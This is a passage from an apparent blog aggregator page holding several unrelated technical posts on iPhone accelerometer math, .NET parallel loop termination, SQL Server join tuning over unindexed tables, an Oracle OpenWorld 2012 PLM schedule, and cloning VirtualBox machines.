subtract gravity. Use this as the forward momentum. (Ignore, for now, the user cases where this will be difficult and let's concentrate on the math :) 3) From the forward vector and the gravity vector, construct a plane. 4) Whenever a force is received, project it onto said plane to get rid of sideways force/etc. 5) Then, use that force, the known magnitude of gravity, and the known direction of forward motion to essentially solve a triangle to get the forward vector. The problem that is causing the most difficulty in this new system is not step 5, which I have gotten to the point where all the numbers look as they should. The difficult part is actually the detection of the forward vector. I am selecting vectors whose magnitude exceeds gravity, and from there, averaging them and subtracting gravity. (I am doing some error checking to make sure that I am not using a force just because the iPhone accelerometer was off by a bit, which happens more frequently than I would like). But if I plot these vectors that I am using, they actually vary by an angle of about 20-30 degrees, which can lead to some strong inaccuracies. The end result is that the app is even more inaccurate now than before. So basically - all you math and iPhone brains out there - any glaring errors? Any potentially better solutions? Any experience that could be useful at all? Award: offering a bounty of $250 to the first answer that leads to a solution.

Read the article
Parallelism in .NET – Part 3, Imperative Data Parallelism: Early Termination

- by Reed

Although simple data parallelism allows us to easily parallelize many of our iteration statements, there are cases that it does not handle well. In my previous discussion, I focused on data parallelism with no shared state, and where every element is being processed exactly the same. Unfortunately, there are many common cases where this does not happen. If we are dealing with a loop that requires early termination, extra care is required when parallelizing. Often, while processing in a loop, once a certain condition is met, it is no longer necessary to continue processing. This may be a matter of finding a specific element within the collection, or reaching some error case. The important distinction here is that, it is often impossible to know until runtime, what set of elements needs to be processed. In my initial discussion of data parallelism, I mentioned that this technique is a candidate when you can decompose the problem based on the data involved, and you wish to apply a single operation concurrently on all of the elements of a collection. This covers many of the potential cases, but sometimes, after processing some of the elements, we need to stop processing. As an example, lets go back to our previous Parallel.ForEach example with contacting a customer. However, this time, we’ll change the requirements slightly. In this case, we’ll add an extra condition – if the store is unable to email the customer, we will exit gracefully. The thinking here, of course, is that if the store is currently unable to email, the next time this operation runs, it will handle the same situation, so we can just skip our processing entirely. The original, serial case, with this extra condition, might look something like the following: foreach(var customer in customers) { // Run some process that takes some time... DateTime lastContact = theStore.GetLastContact(customer); TimeSpan timeSinceContact = DateTime.Now - lastContact; // If it's been more than two weeks, send an email, and update... if (timeSinceContact.Days > 14) { // Exit gracefully if we fail to email, since this // entire process can be repeated later without issue. if (theStore.EmailCustomer(customer) == false) break; customer.LastEmailContact = DateTime.Now; } } .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } Here, we’re processing our loop, but at any point, if we fail to send our email successfully, we just abandon this process, and assume that it will get handled correctly the next time our routine is run. If we try to parallelize this using Parallel.ForEach, as we did previously, we’ll run into an error almost immediately: the break statement we’re using is only valid when enclosed within an iteration statement, such as foreach. When we switch to Parallel.ForEach, we’re no longer within an iteration statement – we’re a delegate running in a method. This needs to be handled slightly differently when parallelized. Instead of using the break statement, we need to utilize a new class in the Task Parallel Library: ParallelLoopState. The ParallelLoopState class is intended to allow concurrently running loop bodies a way to interact with each other, and provides us with a way to break out of a loop. In order to use this, we will use a different overload of Parallel.ForEach which takes an IEnumerable<T> and an Action<T, ParallelLoopState> instead of an Action<T>. Using this, we can parallelize the above operation by doing: Parallel.ForEach(customers, (customer, parallelLoopState) => { // Run some process that takes some time... DateTime lastContact = theStore.GetLastContact(customer); TimeSpan timeSinceContact = DateTime.Now - lastContact; // If it's been more than two weeks, send an email, and update... if (timeSinceContact.Days > 14) { // Exit gracefully if we fail to email, since this // entire process can be repeated later without issue. if (theStore.EmailCustomer(customer) == false) parallelLoopState.Break(); else customer.LastEmailContact = DateTime.Now; } }); There are a couple of important points here. First, we didn’t actually instantiate the ParallelLoopState instance. It was provided directly to us via the Parallel class. All we needed to do was change our lambda expression to reflect that we want to use the loop state, and the Parallel class creates an instance for our use. We also needed to change our logic slightly when we call Break(). Since Break() doesn’t stop the program flow within our block, we needed to add an else case to only set the property in customer when we succeeded. This same technique can be used to break out of a Parallel.For loop. That being said, there is a huge difference between using ParallelLoopState to cause early termination and to use break in a standard iteration statement. When dealing with a loop serially, break will immediately terminate the processing within the closest enclosing loop statement. Calling ParallelLoopState.Break(), however, has a very different behavior. The issue is that, now, we’re no longer processing one element at a time. If we break in one of our threads, there are other threads that will likely still be executing. This leads to an important observation about termination of parallel code: Early termination in parallel routines is not immediate. Code will continue to run after you request a termination. This may seem problematic at first, but it is something you just need to keep in mind while designing your routine. ParallelLoopState.Break() should be thought of as a request. We are telling the runtime that no elements that were in the collection past the element we’re currently processing need to be processed, and leaving it up to the runtime to decide how to handle this as gracefully as possible. Although this may seem problematic at first, it is a good thing. If the runtime tried to immediately stop processing, many of our elements would be partially processed. It would be like putting a return statement in a random location throughout our loop body – which could have horrific consequences to our code’s maintainability. In order to understand and effectively write parallel routines, we, as developers, need a subtle, but profound shift in our thinking. We can no longer think in terms of sequential processes, but rather need to think in terms of requests to the system that may be handled differently than we’d first expect. This is more natural to developers who have dealt with asynchronous models previously, but is an important distinction when moving to concurrent programming models. As an example, I’ll discuss the Break() method. ParallelLoopState.Break() functions in a way that may be unexpected at first. When you call Break() from a loop body, the runtime will continue to process all elements of the collection that were found prior to the element that was being processed when the Break() method was called. This is done to keep the behavior of the Break() method as close to the behavior of the break statement as possible. We can see the behavior in this simple code: var collection = Enumerable.Range(0, 20); var pResult = Parallel.ForEach(collection, (element, state) => { if (element > 10) { Console.WriteLine("Breaking on {0}", element); state.Break(); } Console.WriteLine(element); }); If we run this, we get a result that may seem unexpected at first: 0 2 1 5 6 3 4 10 Breaking on 11 11 Breaking on 12 12 9 Breaking on 13 13 7 8 Breaking on 15 15 What is occurring here is that we loop until we find the first element where the element is greater than 10. In this case, this was found, the first time, when one of our threads reached element 11. It requested that the loop stop by calling Break() at this point. However, the loop continued processing until all of the elements less than 11 were completed, then terminated. This means that it will guarantee that elements 9, 7, and 8 are completed before it stops processing. You can see our other threads that were running each tried to break as well, but since Break() was called on the element with a value of 11, it decides which elements (0-10) must be processed. If this behavior is not desirable, there is another option. Instead of calling ParallelLoopState.Break(), you can call ParallelLoopState.Stop(). The Stop() method requests that the runtime terminate as soon as possible , without guaranteeing that any other elements are processed. Stop() will not stop the processing within an element, so elements already being processed will continue to be processed. It will prevent new elements, even ones found earlier in the collection, from being processed. Also, when Stop() is called, the ParallelLoopState’s IsStopped property will return true. This lets longer running processes poll for this value, and return after performing any necessary cleanup. The basic rule of thumb for choosing between Break() and Stop() is the following. Use ParallelLoopState.Stop() when possible, since it terminates more quickly. This is particularly useful in situations where you are searching for an element or a condition in the collection. Once you’ve found it, you do not need to do any other processing, so Stop() is more appropriate. Use ParallelLoopState.Break() if you need to more closely match the behavior of the C# break statement. Both methods behave differently than our C# break statement. Unfortunately, when parallelizing a routine, more thought and care needs to be put into every aspect of your routine than you may otherwise expect. This is due to my second observation: Parallelizing a routine will almost always change its behavior. This sounds crazy at first, but it’s a concept that’s so simple its easy to forget. We’re purposely telling the system to process more than one thing at the same time, which means that the sequence in which things get processed is no longer deterministic. It is easy to change the behavior of your routine in very subtle ways by introducing parallelism. Often, the changes are not avoidable, even if they don’t have any adverse side effects. This leads to my final observation for this post: Parallelization is something that should be handled with care and forethought, added by design, and not just introduced casually.

Read the article
Heaps of Trouble?

- by Paul White NZ

If you’re not already a regular reader of Brad Schulz’s blog, you’re missing out on some great material. In his latest entry, he is tasked with optimizing a query run against tables that have no indexes at all. The problem is, predictably, that performance is not very good. The catch is that we are not allowed to create any indexes (or even new statistics) as part of our optimization efforts. In this post, I’m going to look at the problem from a slightly different angle, and present an alternative solution to the one Brad found. Inevitably, there’s going to be some overlap between our entries, and while you don’t necessarily need to read Brad’s post before this one, I do strongly recommend that you read it at some stage; he covers some important points that I won’t cover again here. The Example We’ll use data from the AdventureWorks database, copied to temporary unindexed tables. A script to create these structures is shown below: CREATE TABLE #Custs ( CustomerID INTEGER NOT NULL, TerritoryID INTEGER NULL, CustomerType NCHAR(1) COLLATE SQL_Latin1_General_CP1_CI_AI NOT NULL, ); GO CREATE TABLE #Prods ( ProductMainID INTEGER NOT NULL, ProductSubID INTEGER NOT NULL, ProductSubSubID INTEGER NOT NULL, Name NVARCHAR(50) COLLATE SQL_Latin1_General_CP1_CI_AI NOT NULL, ); GO CREATE TABLE #OrdHeader ( SalesOrderID INTEGER NOT NULL, OrderDate DATETIME NOT NULL, SalesOrderNumber NVARCHAR(25) COLLATE SQL_Latin1_General_CP1_CI_AI NOT NULL, CustomerID INTEGER NOT NULL, ); GO CREATE TABLE #OrdDetail ( SalesOrderID INTEGER NOT NULL, OrderQty SMALLINT NOT NULL, LineTotal NUMERIC(38,6) NOT NULL, ProductMainID INTEGER NOT NULL, ProductSubID INTEGER NOT NULL, ProductSubSubID INTEGER NOT NULL, ); GO INSERT #Custs ( CustomerID, TerritoryID, CustomerType ) SELECT C.CustomerID, C.TerritoryID, C.CustomerType FROM AdventureWorks.Sales.Customer C WITH (TABLOCK); GO INSERT #Prods ( ProductMainID, ProductSubID, ProductSubSubID, Name ) SELECT P.ProductID, P.ProductID, P.ProductID, P.Name FROM AdventureWorks.Production.Product P WITH (TABLOCK); GO INSERT #OrdHeader ( SalesOrderID, OrderDate, SalesOrderNumber, CustomerID ) SELECT H.SalesOrderID, H.OrderDate, H.SalesOrderNumber, H.CustomerID FROM AdventureWorks.Sales.SalesOrderHeader H WITH (TABLOCK); GO INSERT #OrdDetail ( SalesOrderID, OrderQty, LineTotal, ProductMainID, ProductSubID, ProductSubSubID ) SELECT D.SalesOrderID, D.OrderQty, D.LineTotal, D.ProductID, D.ProductID, D.ProductID FROM AdventureWorks.Sales.SalesOrderDetail D WITH (TABLOCK); The query itself is a simple join of the four tables: SELECT P.ProductMainID AS PID, P.Name, D.OrderQty, H.SalesOrderNumber, H.OrderDate, C.TerritoryID FROM #Prods P JOIN #OrdDetail D ON P.ProductMainID = D.ProductMainID AND P.ProductSubID = D.ProductSubID AND P.ProductSubSubID = D.ProductSubSubID JOIN #OrdHeader H ON D.SalesOrderID = H.SalesOrderID JOIN #Custs C ON H.CustomerID = C.CustomerID ORDER BY P.ProductMainID ASC OPTION (RECOMPILE, MAXDOP 1); Remember that these tables have no indexes at all, and only the single-column sampled statistics SQL Server automatically creates (assuming default settings). The estimated query plan produced for the test query looks like this (click to enlarge): The Problem The problem here is one of cardinality estimation – the number of rows SQL Server expects to find at each step of the plan. The lack of indexes and useful statistical information means that SQL Server does not have the information it needs to make a good estimate. Every join in the plan shown above estimates that it will produce just a single row as output. Brad covers the factors that lead to the low estimates in his post. In reality, the join between the #Prods and #OrdDetail tables will produce 121,317 rows. It should not surprise you that this has rather dire consequences for the remainder of the query plan. In particular, it makes a nonsense of the optimizer’s decision to use Nested Loops to join to the two remaining tables. Instead of scanning the #OrdHeader and #Custs tables once (as it expected), it has to perform 121,317 full scans of each. The query takes somewhere in the region of twenty minutes to run to completion on my development machine. A Solution At this point, you may be thinking the same thing I was: if we really are stuck with no indexes, the best we can do is to use hash joins everywhere. We can force the exclusive use of hash joins in several ways, the two most common being join and query hints. A join hint means writing the query using the INNER HASH JOIN syntax; using a query hint involves adding OPTION (HASH JOIN) at the bottom of the query. The difference is that using join hints also forces the order of the join, whereas the query hint gives the optimizer freedom to reorder the joins at its discretion. Adding the OPTION (HASH JOIN) hint results in this estimated plan: That produces the correct output in around seven seconds, which is quite an improvement! As a purely practical matter, and given the rigid rules of the environment we find ourselves in, we might leave things there. (We can improve the hashing solution a bit – I’ll come back to that later on). Faster Nested Loops It might surprise you to hear that we can beat the performance of the hash join solution shown above using nested loops joins exclusively, and without breaking the rules we have been set. The key to this part is to realize that a condition like (A = B) can be expressed as (A <= B) AND (A >= B). Armed with this tremendous new insight, we can rewrite the join predicates like so: SELECT P.ProductMainID AS PID, P.Name, D.OrderQty, H.SalesOrderNumber, H.OrderDate, C.TerritoryID FROM #OrdDetail D JOIN #OrdHeader H ON D.SalesOrderID >= H.SalesOrderID AND D.SalesOrderID <= H.SalesOrderID JOIN #Custs C ON H.CustomerID >= C.CustomerID AND H.CustomerID <= C.CustomerID JOIN #Prods P ON P.ProductMainID >= D.ProductMainID AND P.ProductMainID <= D.ProductMainID AND P.ProductSubID = D.ProductSubID AND P.ProductSubSubID = D.ProductSubSubID ORDER BY D.ProductMainID OPTION (RECOMPILE, LOOP JOIN, MAXDOP 1, FORCE ORDER); I’ve also added LOOP JOIN and FORCE ORDER query hints to ensure that only nested loops joins are used, and that the tables are joined in the order they appear. The new estimated execution plan is: This new query runs in under 2 seconds. Why Is It Faster? The main reason for the improvement is the appearance of the eager Index Spools, which are also known as index-on-the-fly spools. If you read my Inside The Optimiser series you might be interested to know that the rule responsible is called JoinToIndexOnTheFly. An eager index spool consumes all rows from the table it sits above, and builds a index suitable for the join to seek on. Taking the index spool above the #Custs table as an example, it reads all the CustomerID and TerritoryID values with a single scan of the table, and builds an index keyed on CustomerID. The term ‘eager’ means that the spool consumes all of its input rows when it starts up. The index is built in a work table in tempdb, has no associated statistics, and only exists until the query finishes executing. The result is that each unindexed table is only scanned once, and just for the columns necessary to build the temporary index. From that point on, every execution of the inner side of the join is answered by a seek on the temporary index – not the base table. A second optimization is that the sort on ProductMainID (required by the ORDER BY clause) is performed early, on just the rows coming from the #OrdDetail table. The optimizer has a good estimate for the number of rows it needs to sort at that stage – it is just the cardinality of the table itself. The accuracy of the estimate there is important because it helps determine the memory grant given to the sort operation. Nested loops join preserves the order of rows on its outer input, so sorting early is safe. (Hash joins do not preserve order in this way, of course). The extra lazy spool on the #Prods branch is a further optimization that avoids executing the seek on the temporary index if the value being joined (the ‘outer reference’) hasn’t changed from the last row received on the outer input. It takes advantage of the fact that rows are still sorted on ProductMainID, so if duplicates exist, they will arrive at the join operator one after the other. The optimizer is quite conservative about introducing index spools into a plan, because creating and dropping a temporary index is a relatively expensive operation. It’s presence in a plan is often an indication that a useful index is missing. I want to stress that I rewrote the query in this way primarily as an educational exercise – I can’t imagine having to do something so horrible to a production system. Improving the Hash Join I promised I would return to the solution that uses hash joins. You might be puzzled that SQL Server can create three new indexes (and perform all those nested loops iterations) faster than it can perform three hash joins. The answer, again, is down to the poor information available to the optimizer. Let’s look at the hash join plan again: Two of the hash joins have single-row estimates on their build inputs. SQL Server fixes the amount of memory available for the hash table based on this cardinality estimate, so at run time the hash join very quickly runs out of memory. This results in the join spilling hash buckets to disk, and any rows from the probe input that hash to the spilled buckets also get written to disk. The join process then continues, and may again run out of memory. This is a recursive process, which may eventually result in SQL Server resorting to a bailout join algorithm, which is guaranteed to complete eventually, but may be very slow. The data sizes in the example tables are not large enough to force a hash bailout, but it does result in multiple levels of hash recursion. You can see this for yourself by tracing the Hash Warning event using the Profiler tool. The final sort in the plan also suffers from a similar problem: it receives very little memory and has to perform multiple sort passes, saving intermediate runs to disk (the Sort Warnings Profiler event can be used to confirm this). Notice also that because hash joins don’t preserve sort order, the sort cannot be pushed down the plan toward the #OrdDetail table, as in the nested loops plan. Ok, so now we understand the problems, what can we do to fix it? We can address the hash spilling by forcing a different order for the joins: SELECT P.ProductMainID AS PID, P.Name, D.OrderQty, H.SalesOrderNumber, H.OrderDate, C.TerritoryID FROM #Prods P JOIN #Custs C JOIN #OrdHeader H ON H.CustomerID = C.CustomerID JOIN #OrdDetail D ON D.SalesOrderID = H.SalesOrderID ON P.ProductMainID = D.ProductMainID AND P.ProductSubID = D.ProductSubID AND P.ProductSubSubID = D.ProductSubSubID ORDER BY D.ProductMainID OPTION (MAXDOP 1, HASH JOIN, FORCE ORDER); With this plan, each of the inputs to the hash joins has a good estimate, and no hash recursion occurs. The final sort still suffers from the one-row estimate problem, and we get a single-pass sort warning as it writes rows to disk. Even so, the query runs to completion in three or four seconds. That’s around half the time of the previous hashing solution, but still not as fast as the nested loops trickery. Final Thoughts SQL Server’s optimizer makes cost-based decisions, so it is vital to provide it with accurate information. We can’t really blame the performance problems highlighted here on anything other than the decision to use completely unindexed tables, and not to allow the creation of additional statistics. I should probably stress that the nested loops solution shown above is not one I would normally contemplate in the real world. It’s there primarily for its educational and entertainment value. I might perhaps use it to demonstrate to the sceptical that SQL Server itself is crying out for an index. Be sure to read Brad’s original post for more details. My grateful thanks to him for granting permission to reuse some of his material. Paul White Email: [email protected] Twitter: @PaulWhiteNZ

Read the article
Your Day-by-Day Guide to Agile PLM at Oracle OpenWorld 2012

- by Kerrie Foy

This year’s Oracle OpenWorld conference is nearly here, and we’re all excited about what we have planned! With five days of activities and customer presenters from market leaders and top innovators like The Coca-Cola Company, Starbucks, JDSU, Facebook, GlobalFoundries, and more, this is an event you don't want to miss. I've compiled this day-by-day guide to help anyone keep track of all the “Product Lifecycle Management and Product Value Chain” sessions and activities at OpenWorld 2012, September 30 – October 4 in San Francisco, California. Monday, October 1 There are great networking activities on Sunday September 30, but PLM specific sessions start after general conference keynotes on Monday, October 1 at 10:45 a.m. at the InterContinental Hotel in room Telegraph Hill. In fact, most of our sessions this year will be held in this room, which is still close to the conference keynotes in Moscone, but just far enough away to allow some focused networking and discussions. This first session, 10:45 – 11:45 a.m. is a joint session with the Agile and AutoVue teams, entitled “Streamline PLM Design-to-Manufacturing Processes with AutoVue Visualization Soltuions” featuring presenters from Oracle as well as joint AutoVue and Agile PLM customer GlobalFoundries. In the following 12:15 – 1:15 p.m. slot, there are two sessions to choose from, so if you have a team of representatives attending OpenWorld, you may consider splitting up to catch both of these: a) Our General Session will be held in the InterContinental Hotel Ballroom C, which will cover our complete enterprise PLM strategy, product updates, and roadmaps. It’s our pleasure to feature a customer keynote presentation from Chris Bedi, CIO, and Rajeev Sethi, Director IT Business Engagement, of JDSU. b) A focused session on integrating PLM with Engineering and Supply Chain Systems will be held on the second floor of Moscone West (next to the InterContinental) in room 2022. Join to discover how these types of integrations help companies manage common and integrated design information across all MCAD, ECAD, and software components. After a lunch break and perhaps a visit to the Demogrounds in Moscone West, select from two product roadmap sessions in the next time slot (3:15 – 4:15 p.m.): an Agile 9.3.x session located in the InterContinental’s Ballroom C, and an Agile PLM for Process session located back in the InterContinental’s Telegraph Room. Both sessions will have strong content around each product line’s latest releases, vision, and customer examples. We are very pleased to feature Daniel Soosai of Facebook in the A9 session and Vinnie D’Agostino of The Coca-Cola Company in the PLM for Process session. Afterwards, hang in there for one last session of the day from 4:45 – 5:45 p.m.; it’s an insightful discussion on leveraging Agile PLM as the Foundation for Enterprise Quality Management, and it’s sure to be one of the best. In the Telegraph Room, this session will feature Oracle experts, partner co-presenter David Bartlett from CPG Solutions, and customer co-presenter Thomas Crowe, CIO of PL Developments. Hear their experience around implementing collaborative, integrated solutions to ensure effective knowledge transfer throughout an organization, and how to perform analysis in real time to resolve product quality issues swiftly and efficiently. On Monday evening there will be plenty of industry, product, and partner dinners, so take advantage of all the networking opportunities and catch some great tunes at the 5 day Oracle OpenWorld Music Festival! Tuesday, October 2 Tuesday starts early with a special PLM Networking Brunch, sponsored by several partners, from 8:30 a.m. – 10:30 a.m. at the B Restaurant that sits atop Yerba Buena Gardens. You’ll have the unique opportunity to meet with like-minded industry peers and a PLM partner to discuss a topic of your choosing while enjoying a delicious meal. Registration is required, so to inquire about attending this brunch, please email Terri.Hiskey-AT-oracle.com. After wrapping up your conversations over brunch, head over to the Marriott Marquis in the Nob Hill CD room for a chance to experience the Oracle Product Lifecycle Analytics solution in a Hands-On Lab, open from 10:15 a.m. – 12:45 p.m. Experts will be there to answer your questions. Back in the InterContinental Hotel’s Telegraph room, the session on “Ideation and Requirements Management: Capturing the Voice of the Customer” begins at 11:45 a.m. – 12:45 p.m. This may be the session for you if you’re struggling with challenges like too many repositories of customer needs, requests, and ideas; limited visibility into which ideas are being advanced by customers and field resources; or if you’re unable to leverage internal expertise to expose effort and potential risks. This session will discuss how Agile PLM can help you overcome ideation challenges to deliver the right products to their targeted markets and fulfill customer desires. Next, from 1:15 – 2:15 p.m. join us for a session on Managing Profitable Innovation with Oracle Product Lifecycle Analytics. If you missed the Hands-on Lab, have more questions, or simply want to be inspired by the product’s forward-thinking vision and capabilities, this is a great opportunity to meet the progressive-minded executives behind the application. After this session, it may be a good opportunity to swing by the Demogrounds in Moscone West and visit the Agile PLM demos at exhibit booths #81 for Agile PLM for Discrete Manufacturing, #70 for Agile PLM for Process, and #82 for AutoVue and Agile PLM Enterprise Visualization. Check out the related Supply Chain Management booths close by if you’re interested - here's the map. There’s always lots to see and do around the exhibit area. But don’t forget the last session of the day from 5:00 p.m. – 6:00 p.m. in Telegraph Hill on Managing Product Innovation and Compliance in Life Science Companies, a “must-see” if you’re in this industry. Launching innovative products quickly is already a high-stakes challenge, but companies in the life sciences industry face uniquely severe consequences when new products don’t perform or comply as required. In recent years, more and more regulations have become mandatory, and new ones, such as REACH, are currently going into effect for several companies. Customer presenters from pharmaceutical leader Eli Lilly will share how they’ve leveraged Agile PLM to deliver high-quality, innovative products in a fast-paced, heavily regulated market environment. Tuesday evening unwind at the Supply Chain Management Reception from 6:00 – 8:00 p.m. at the premier boutique Roe Nightclub and Lounge, which is located about three blocks down on Howard Street (on the other side of Moscone from the InterContinental Hotel). Registration is required. Click here for the details. Wednesday, October 3 We have another full line-up on Wednesday, so be ready for an action-packed day. We start with a session at 10:15 – 11:15 a.m. in the Telegraph Room where we have a session on “PLM for Consumer Products: Building an Engine for Quality and Innovation” with featured presenters from Starbucks and partner Kalypso. This is a rare opportunity to learn directly from Starbucks how they instill quality and innovation throughout their organization, products, and processes, leveraging PLM disciplines with strong support from their partner. If you’re not in the consumer products industry, we recommend attending another session at 10:15 – 11:15 a.m. in Moscone West room 3005: “Eco-Enterprise Innovation Awards and the Business Case for Sustainability” featuring Jeff Henley, Oracle’s Chairman of the Board and Jon Chorley, Chief Sustainability Officer. Oracle will honor select customers with Oracle’s Eco-Enterprise Innovation award, which recognizes customers and their respective partners who rely on Oracle products to support their green business practices to reduce their environmental impact while improving business efficiencies and reducing costs. The awards presentation is followed by a panel discussion with customers and Oracle executives, who describe how these award-winning organizations are embracing environmental initiatives as a central part of their business strategy and how information technology plays a pivotal role. Next at 11:45 a.m. – 12:45 p.m. in Telegraph Hill attend our session devoted to exploring Product Lifecycle Management’s role in Software Lifecycle Management. This is a thought leadership session with Oracle experts in the field on the importance of change management, and we’ll discuss how Oracle has for years leveraged Agile PLM to develop Agile PLM. If software lifecycle management doesn’t apply to your business or you’d rather engage in some lively one-on-one discussions, we also have a “Supply Chain Meet the Experts” session in Moscone West Room 2001A. Product experts, thought leaders and executives will be on hand to discuss your questions/topics, so come prepared. This session tends to fill up fast so try to get in early. At 1:15 – 2:15 p.m. join us back in Telegraph Hill for a session focused on leveraging the Agile Product Portfolio Management application as the Product Development Master Schedule to improve efficiencies, optimize resources, and gain visibility across projects enterprise-wide to improve portfolio profitability. Customer presenters from Broadcom will explain how they’ve leveraged the product to enable a master schedule with enterprise-level, phase-gate program and project collaboration and resource optimization. Again in Telegraph Hill from 3:30 – 4:30 p.m. we have an interesting session with leading semiconductor customer LSI and partner Kalypso on how LSI leveraged Agile PLM to advance from homegrown applications to complete Product Value Chain Management. That type of transition can be challenging, and LSI details how they were able to achieve their goals and the value they gained along the journey – a fascinating account for any company interested in leveraging best practices to innovate their business processes and even end products. Lastly, we’ll wrap up in Telegraph Hill from 5:00 – 6:00 p.m. with a session on “Ensuring New Product Success by Achieving Excellence in New Product Introduction.” This is a cross-industry session, guaranteed to deliver insight in the often elusive practice of creating winning products, and we’re very excited about. According to IDC Manufacturing Insights analyst Joe Barkai, “Product Failures are not necessarily a result of bad ideas…they are a result of suboptimal decisions.” We’ll show you how to wire your business processes to enhance decision-making and maximize product potential. Now, quickly hit your hotel room to freshen up and then catch one of the many complimentary shuttles to the much-anticipated Oracle Customer Appreciation Event on Treasure Island. We have a very exciting show planned – check out what’s in store here. Thursday, October 4 PLM has a light schedule on Thursday this year with just one session, but this again is one of our best sessions on managing the Product Value Chain: at 11:15 a.m – 12:15 p.m.in Telegraph Hill, it’s a customer and partner driven session with Sonoco Products and Deloitte telling their story about how to achieve integrated change control by interfacing Agile PLM with Oracle E-Business Suite. Sonoco Products, a global manufacturer of consumer and industrial packaging materials, with its systems integrator, Deloitte, is doing this by implementing prebuilt integration (Oracle Design-to-Release Integration Pack for Agile Product Lifecycle Management for Process and Oracle Process) to integrate Agile with Oracle Product Hub/Oracle Product Information Management and Oracle E-Business Suite. This session presents a case study of how Sonoco is leveraging this solution to improve data quality and build a framework for stronger master data governance. Even though that ends our PLM line-up at OpenWorld, there will still be many sessions and activities at the conference, so visit the Oracle OpenWorld website to review agendas and build your schedule. And of course, download and bring this guide and the latest version of the Agile PLM Focus-On Document (available soon!). San Francisco is a wonderful city to explore, and we’re glad you’re considering joining the Agile PLM team at Oracle OpenWorld! I hope to see you there! Follow me before the conference and on site for real-time updates about #OOW12 on Twitter @Kerrie_Foy or @AgilePLM.

Read the article
Begin the Clone Wars Have!

- by Antony Reynolds

Creating a New Virtual Machine from an Existing Virtual Disk In previous posts I described how I set up an OEL6 machine under VirtualBox that can run an 11gR2 database and FMW 11.1.1.5. That is great if you want the DB and FMW running in the same virtual image and it has served me well for some proof of concepts and also for some testing of different JVMs. However I also wanted to run some testing of FMW with the database running on a separate physical machine. So in this post I will show how to take a VirtualBox image and create a new image based on the disks from that original image. What are my Options? There is more than one way to skin a cat, or in this case to create two separate VMs that can run on different hardware. Some of the options include: Create new virtual disk images for each new VM. Clone the existing disk images and point the new VM at the cloned images. Point the new VM at the existing snapshots. #1 is too much like hard work, install OEL twice, install a database again, install FMW again, run RCU again! Life is too short! #2 is probably the safest way of doing things. VirtualBox allows you to clone a disk image for use in a separate machine. However this of course duplicates the disk and means that it is now occupying 3 times the space, once for the original disk and twice more for the two clones I would need. #3 is the most space efficient way of doing things. It does mean however that I can only run the new “cloned” images if I have access to the original image because that is where the base snapshots reside. However this is not a problem for me as long as I remember to keep all threee images together. So this is the approach we will follow. Snapshot, What Snapshot? As we are going to create new virtual machines based on existing snapshots we need to figure out which snapshot to use. We do this by opening the “Media Manager” from within VirtualBox and moving the mouse over the snapshot images until we find the snapshots we want – the snapshot name is identified in the “Attached to:” comment. In my case I wanted the FMW installed snapshot because that had a database configured for FMW alongside the FMW software. I made a note of the filename of that snapshot (actually I just noted the first 5 characters as that was all that was needed to uniquely identify the snapshot file). When we create the new machines we will point them at the snapshot filename we have just checked. Network or NotWork? Because we want the two new machines to communicate with each other when hosted in different physical machines we can’t use the default NAT networking mode without a lot of hassle. But at the same time we need them to have fixed IP addresses relative to each other so that they can see each other whilst also being able to see the outside world. To achieve all these requirements I created two network adapters for each machine. Adapter 1 was a standard NAT mapping. This will allow each machine to get a dynamic IP address (10.0.2.15 by default) that can be used to access the external world through the VBox provided NAT gateway. This is the same as the existing configuration. The second adapter I created as a bridged adapter. This gives the virtual machine direct access to the host network card and by using fixed IP addresses each machine can see the other. It is important to choose fixed IP addresses that are not routable across your internal network so you don’t get any clashes with other machines on your network. Of course you could always get proper fixed IP addresses from your network people, but I have serveral people using my images and as long as I don’t have two instances of the same VM on the same network segment this is easier and avoids reconfiguring the network every time someone wants a copy of my VM. If it is available I would suggest using the 10.0.3.* network as 10.0.2.* is the default NAT network. You can check availability by pinging 10.0.3.1 and 10.0.3.2 from your host machine. If it times out then you are probably safe to use that. Creating the New VMs Now that I had collected the data that I needed I went ahead and created the new VMs. When asked for a “Boot Hard Disk” I used the “Choose a virtual hard disk file…” link to find the snapshot I had previously selected and set that to be the existing hard disk. I chose the previously existing SOA 11.1.1.5 install for both the new DB and FMW machines because that snapshot had the database with the RCU completed that I wanted for my DB machine and it had the SOA software installed which I wanted for my FMW machine. After the initial creation of the virtual machine go into the network setting section and enable a second adapter which will be bridged. Make a note of the MAC addresses (the last four digits should be sufficient) of the two adapters so that you can later set the bridged adapter to use fixed IP and the NAT adapter to use DHCP. We are now ready to start the VMs and reconfigure Linux. Reconfiguring Linux Because I now have two new machines I need to change their network configuration. In particular I need to change the hostname, update the hosts file and change the network settings. Changing the Hostname I renamed both hosts by running the hostname command as root: hostname vboxfmw.oracle.com I also edited the /etc/sysconfig file and set the correct hostname in there. HOSTNAME=vboxfmw.oracle.com Changing the Network Settings I needed to change the network configuration to give the bridged network a fixed IP address. I first explicitly set the MAC addresses of the two adapters, because the order of the virtual adapters in the VirtualBox Manager is not necessarily the same as the order of the adapters in the guest OS. So I went in to the System->Preferences->Network Connections screen and explicitly set the “Device MAC address” for the two adapters. Having correctly mapped the Linux adapters to the VirtualBox adapters I then set the Bridged adapter to use fixed IP addressing rather than DHCP. There is no need for additional routing or default gateways because we expect the two machine to be on the same LAN segment. Updating the Hosts File Having renamed the machines and reconfigured the network I then updated the /etc/hosts file to refer to the new machine name add a new line to the hosts file to provide an additional IP address for my server (the new fixed IP address) add a new line for the fixed IP address of the other virtual machine 10.0.3.101 vboxdb.oracle.com vboxdb # Added by NetworkManager 10.0.2.15 vboxdb.oracle.com vboxdb # Added by NetworkManager 10.0.3.102 vboxfmw.oracle.com vboxfmw # Added by NetworkManager 127.0.0.1 localhost.localdomain localhost ::1 vboxdb.oracle.com vboxdb localhost6.localdomain6 localhost6 To make sure everything takes effect I restarted the server. Reconfiguring the Database on the DB Machine Because we changed the hostname the listener and the EM console no longer start so I need to modify the listener.ora to use the new hostname and I also need to rebuild the EM configuration because it also relies on the hostname. I edited the $ORACLE_HOME/network/admin/listener.ora 